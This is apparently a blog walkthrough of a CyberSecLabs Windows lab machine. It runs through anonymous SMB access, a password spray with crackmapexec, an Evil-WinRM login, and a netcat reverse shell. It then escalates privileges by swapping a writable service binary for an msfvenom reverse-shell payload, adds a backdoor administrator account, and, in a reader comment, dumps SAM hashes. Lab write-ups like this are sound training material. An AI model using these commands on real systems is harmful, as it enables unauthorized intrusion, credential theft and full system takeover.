CyberSecLabs "SAM" No Metasploit Version

Sam is another great offering from CyberSecLabs ( that provides an easy in with appropriate enumeration, and a difficult solution relying on more than the regular automated tools.  This machine was a bit humbling as I've become more and more reliant of tools like winPEAS, and Sam reminded me that the answer isn't always found using these tools.  So sit back and relax while we walk through this together, and please enjoy!


From now on I've added my "MayorScan3000" portscanning tool into the equation when I'm kicking off, as folks have been telling me I waste time by not scanning all ports.  So I juiced up my port scanner to run with threading enabled.  Meanwhile I'll still do my basic Nmap Scan as well to grab those immediate results.


 nmap -p135,139,445,3389,5985 -A

Nmap doesn't return much information, but we do see that SMB is running on the target, which can give us a good start.  Let's enumerate!


We can begin by inspecting the SMB service using smbclient.

smbclient -L

Running smbclient shows that there are several shares, with "backups" being accessible.  We need to investigate this further.
smbclient \\\\\\backups -U ''

Well this was pretty easy, right?  We've discovered a misconfigured share that allows anonymous access to the C:\. Let's exploit it!


 With such unrestricted access to the file system, we should really search around some.  We can quickly check the Users directory, which shows us the user "jamie."  Additionally we can head to jamie's Desktop and grab the user flag there.

User Flag on Jamie's Desktop

 So now that we have a flag, and a user name, we need to determine what to do from here.  We discovered a username, so we could try to enumerate that a bit.  Let's use Crackmapexec for this.

crackmapexec smb -u jamie -p /root/Desktop/passes.txt

Crackmapexec makes quick work of locating a password for the user.  We saw port 5985 open earlier which means we can probably use Evil-WinRM to connect.  Let's do that.
evil-winrm -i -u jamie -p redacted

We are successfully logged in!  We see that we are jamie on the machine, and now we need to get to escalating our privileges.  We can start by starting a Python server and pulling our tools to the target machine and running winPEAS to start.

powershell -c wget "" -outfile "winPEAS.exe"; C:\Users\jamie\Documents\winPEAS.exe

Keep in mind we are using PowerShell currently and need to provide the entire program path in order to run it.  Unfortunately we aren't able to find any real information about the machine or escalation in winPEAS.  This was the same with PowerUp.ps1 as well.  I started scratching my head for a moment and had to remind myself that there are plenty of ways to manually enumerate privileges, services, etc.  Let's do some of that.
whoami /priv

Our user privileges don't show much that we can take advantage of unfortunately.  We can check for running services next.

services (not a typical way to execute this query)

The above took some trial and error because Powershell uses "Get-Services" to list the running services, and that wasn't working as expected.  Running services did, however, which revealed the above.  Of note is the monitor1 and monitor2 services.  Unfortunately we cannot do much to gather more information on these from Evil-WinRM, so I decided to move to a reverse shell using Netcat, and get out of Powershell.  This required me to transfer a Netcat.exe binary to the machine first, and then connect to my Kali machine.
Top nc -nlvp 5555; Bottom C:\Users\jamie\Documents\nc.exe 5555 -e cmd.exe; Top - sc qc monitor1

We see that the service is running as LocalSystem, and that it can be started/stopped.  Knowing this, we need to ensure that we can modify the directory and it's contents.  We can use icacls for this.

icacls Services

There is a lot going on in the above image, but what is important is that Users has a RX and W in the results.  This means that we can Read, Write, and Execute in the directory location.  Now all we need to do then is to replace the monitor1.exe with a malicious executable and restart the service.  

msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=2246 -f exe > monitor1.exe
We can not move this to the target machine, start another Netcat listener to catch the shell, and start the service.
Left - powershell -c wget "" -outfile "monitor1.exe"; sc stop monitor1; Right - nc -nlvp 2246; Left - sc start monitor1; Right - reverse shell successful
A quick whoami shows that we are NT AUTHORITY\SYSTEM.  We can head to the Administrator's Desktop quick to grab the system flag.
System.txt flag on Administrator's Desktop
We can additionally do some Post-Exploitation to take full control of the machine.  
Right - net user themayor !Password123 /add; net localgroup Administrators themayor /add; Left - xfreerdp /u:themayor /p:'!Password123' /v: RDP Login
A quick check of the server users shows that we are indeed a Server Admin now. 

Final Thoughts

Sam is yet another great offering from CyberSecLabs where you are forced to take a slightly less expected or known path to escalate privileges.  Becoming reliant on automated tools is easy, but Sam reminds us that we need to remember that manual enumeration is important, as is staying curious on an engagement.  I hope that you've all learned something from this guide today, and I look forward to seeing you again soon!


Anonymous said…
great write up!
you can also find copies of the sam and system files on the backup share at windows\system32\config, copy these over to kali, and run them through samdump2 to extract usernames and hashes.

Popular Posts